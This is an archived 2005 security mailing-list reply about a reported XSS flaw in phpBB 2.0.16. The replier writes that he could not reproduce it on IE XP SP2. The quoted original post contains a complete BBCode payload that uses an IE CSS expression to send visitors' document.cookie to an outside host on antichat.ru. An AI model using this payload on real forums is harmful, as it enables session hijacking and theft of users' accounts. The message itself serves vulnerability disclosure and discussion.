[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0507112120450.21472-100000@bugsbunny.castlecops.com>
Date: Tue Jul 12 02:24:09 2005
From: zx at castlecops.com (Paul Laudanski)
Subject: Re: XSS in nested tag in phpbb 2.0.16
Interestingly I have tried this using IE XP SP2 and could not replicate.
I'll certainly be trying this out again on a vanilla installation.
I'm curious what the hit rate of this is for folks running phpbb 2.0.16?
On Tue, 5 Jul 2005, alex wrote:
> [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl
> e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antic
> hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u
> rl][/url]'[/color]
>
> More info:
> http://www.securitylab.ru/55612.html
>
> and
>
> http://antichat.ru/txt/phpbb/
>
> (In Russian)
--
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com
________ Information from Computer Cops, L.L.C. ________
This message was checked by NOD32 Antivirus System for Linux Mail Server.
part000.txt - is OK
http://castlecops.com
Powered by blists - more mailing lists